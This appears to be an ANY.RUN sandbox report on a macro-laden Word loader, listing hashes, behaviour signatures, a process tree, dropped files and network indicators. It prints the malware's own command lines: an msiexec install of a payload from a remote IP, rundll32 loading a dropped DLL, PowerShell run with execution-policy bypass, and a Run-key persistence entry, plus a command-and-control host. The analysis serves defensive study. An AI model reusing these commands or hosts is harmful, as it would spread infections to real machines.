analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

NOTA GERENCIA DE ADM.doc

Full analysis: https://app.any.run/tasks/b80e9dc5-d61b-4bf2-91ba-e4a4b1b33f12
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: March 21, 2019, 22:43:19
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
exe-to-msi
loader
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 1, Template: Normal.dotm, Last Saved By: 1, Revision Number: 9, Name of Creating Application: Microsoft Office Word, Total Editing Time: 26:00, Create Time/Date: Thu Mar 21 07:56:00 2019, Last Saved Time/Date: Thu Mar 21 08:22:00 2019, Number of Pages: 1, Number of Words: 1, Number of Characters: 9, Security: 0
MD5:

B33A8F8AA723240E2E8D3CFD74F66384

SHA1:

C07FAABB80CFA8F00E37770BEDF2D61A6849CF3A

SHA256:

9EC913A7C1694C9F63FCB28322BDAEEE2205C8924C8AE05CC4EE30AA314F6511

SSDEEP:

1536:VqfY8qaiKOCDP9czDKaT+ej7Nhbi9AFl1SLLPtArDaV:VHHaiKOi9LInKc2Or+

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 540)
    • Uses Microsoft Installer as loader

      • WINWORD.EXE (PID: 540)
    • Loads dropped or rewritten executable

      • rundll32.exe (PID: 3336)
    • Downloads executable files from the Internet

      • msiexec.exe (PID: 3844)
    • Application was dropped or rewritten from another process

      • nsA533.tmp (PID: 1516)
    • Downloads executable files from IP

      • msiexec.exe (PID: 3844)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2988)
    • Changes the autorun value in the registry

      • reg.exe (PID: 3204)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 3844)
      • MSIA40A.tmp (PID: 3920)
    • Drop ExeToMSI Application

      • msiexec.exe (PID: 3844)
    • Starts application with an unusual extension

      • MSIA40A.tmp (PID: 3920)
    • Starts CMD.EXE for commands execution

      • nsA533.tmp (PID: 1516)
      • rundll32.exe (PID: 3336)
    • Uses RUNDLL32.EXE to load library

      • cmd.exe (PID: 240)
    • Creates files in the user directory

      • powershell.exe (PID: 4016)
    • Uses REG.EXE to modify Windows registry

      • cmd.exe (PID: 3732)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 540)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 540)
    • Starts application with an unusual extension

      • msiexec.exe (PID: 3844)
    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 3844)
    • Application was dropped or rewritten from another process

      • MSIA40A.tmp (PID: 3920)
    • Loads dropped or rewritten executable

      • MSIA40A.tmp (PID: 3920)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: ???????? Microsoft Word 97-2003
CompObjUserTypeLen: 32
LastSaved: 2018:12:18 00:00:00
Created: 2018:12:18 00:00:00
CodePage: Windows Cyrillic
HeadingPairs:
  • Название
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 9
Paragraphs: 1
Lines: 1
Company: -
Security: None
Characters: 9
Words: 1
Pages: 1
ModifyDate: 2019:03:21 08:22:00
CreateDate: 2019:03:21 07:56:00
TotalEditTime: 26.0 minutes
Software: Microsoft Office Word
RevisionNumber: 9
LastModifiedBy: 1
Template: Normal.dotm
Keywords: -
Author: 1
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
45
Monitored processes
11
Malicious processes
7
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs msiexec.exe no specs msiexec.exe msia40a.tmp nsa533.tmp no specs cmd.exe no specs rundll32.exe cmd.exe no specs powershell.exe no specs cmd.exe no specs reg.exe

Process information

PID
CMD
Path
Indicators
Parent process
540"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\NOTA GERENCIA DE ADM.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
1780"C:\Windows\System32\msiexec.exe" at=c36Ik back=002 error=Continue /i http://169.239.128.104/alg /q OnExit="c:\windows\calc.exe" FW=c36Ik C:\Windows\System32\msiexec.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3844C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3920"C:\Windows\Installer\MSIA40A.tmp"C:\Windows\Installer\MSIA40A.tmp
msiexec.exe
User:
admin
Company:
hepsu burda
Integrity Level:
MEDIUM
Description:
hepsu burda Application
Version:
1.0.2.1
1516"C:\Users\admin\AppData\Local\Temp\nscA522.tmp\nsA533.tmp" "cmd.exe" /c rundll32.exe C:\Users\admin\AppData\Local\Temp\xmlparse.dll, segaC:\Users\admin\AppData\Local\Temp\nscA522.tmp\nsA533.tmpMSIA40A.tmp
User:
admin
Integrity Level:
MEDIUM
240"cmd.exe" /c rundll32.exe C:\Users\admin\AppData\Local\Temp\xmlparse.dll, segaC:\Windows\system32\cmd.exensA533.tmp
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3336rundll32.exe C:\Users\admin\AppData\Local\Temp\xmlparse.dll, segaC:\Windows\system32\rundll32.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2988cmd.exe /C powershell -nop -ep bypass -f %temp%\enu.ps1C:\Windows\system32\cmd.exerundll32.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
4016powershell -nop -ep bypass -f C:\Users\admin\AppData\Local\Temp\enu.ps1C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3732cmd.exe /C reg add "HKCU\SOFTWARE\microsoft\windows\currentversion\run" /v ServiceDLL /t REG_EXPAND_SZ /d "rundll32 %temp%\xmlparse.dll, sega" /fC:\Windows\system32\cmd.exerundll32.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
1 652
Read events
902
Write events
0
Delete events
0

Modification events

No data
Executable files
6
Suspicious files
4
Text files
12
Unknown types
8

Dropped files

PID
Process
Filename
Type
540WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR89D8.tmp.cvr
MD5:
SHA256:
540WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF9879E18BB8692AC6.TMP
MD5:
SHA256:
540WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFD8B19B69506E2477.TMP
MD5:
SHA256:
540WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF07B0EA014AC39095.TMP
MD5:
SHA256:
3844msiexec.exeC:\Users\admin\AppData\Local\Temp\~DFBADE219DC2F4651A.TMP
MD5:
SHA256:
540WINWORD.EXEC:\Users\admin\Desktop\~$TA GERENCIA DE ADM.docpgc
MD5:9143F1C31818C8297EFEEFB770EAA92B
SHA256:9690AB9D24D7B189D9F27223DFF48D09C6BEC65E755DA18ED117EB7B096D982F
540WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:413F5B35D610764C7705F23F2AC7FBF0
SHA256:5D3AFBD27EF4F4E5626D2A303321F235DB54A78A7DAC93A60B1B106CB85E05F0
3844msiexec.exeC:\Users\admin\AppData\Local\Temp\Temporary Internet Files\Content.IE5\index.datdat
MD5:DCBFB6529E798365955FF5472F78EC54
SHA256:F4FF89416B3D2A9EB735C59914388A4DA36CB468C603D2CACEA305F1281F882F
540WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\NOTA GERENCIA DE ADM.doc.LNKlnk
MD5:7DC2CC90BF5970C39A70F052F1D0EA1F
SHA256:079F843B35B6C0D90E6930B1CE4D721A8E22352C810F85F34910FAA87B4B8149
3844msiexec.exeC:\Windows\Installer\MSIA2B0.tmpbinary
MD5:2CFDE39126C7A0E7CFDE4D79FB4123B3
SHA256:D0B761E1EC7A7F0903B742B41C52AFE73244F295A71E4F4BF114FD54C725BB1B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3844
msiexec.exe
GET
200
169.239.128.104:80
http://169.239.128.104/alg
ZA
executable
396 Kb
suspicious
3336
rundll32.exe
POST
200
179.43.156.37:80
http://cdnavupdate.icu/jquery/jquery.php
CH
text
140 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3336
rundll32.exe
179.43.156.37:80
cdnavupdate.icu
Private Layer INC
CH
suspicious
3844
msiexec.exe
169.239.128.104:80
Zappie Host LLC
ZA
suspicious

DNS requests

Domain
IP
Reputation
cdnavupdate.icu
  • 179.43.156.37
malicious

Threats

PID
Process
Class
Message
3844
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Using msiexec.exe for Downloading non-MSI file
3844
msiexec.exe
Potential Corporate Privacy Violation
POLICY [PTsecurity] Executable application_x-msi Download
Potentially Bad Traffic
ET INFO DNS Query for Suspicious .icu Domain
3336
rundll32.exe
Potentially Bad Traffic
ET INFO HTTP POST Request to Suspicious *.icu domain
1 ETPRO signatures available at the full report
No debug info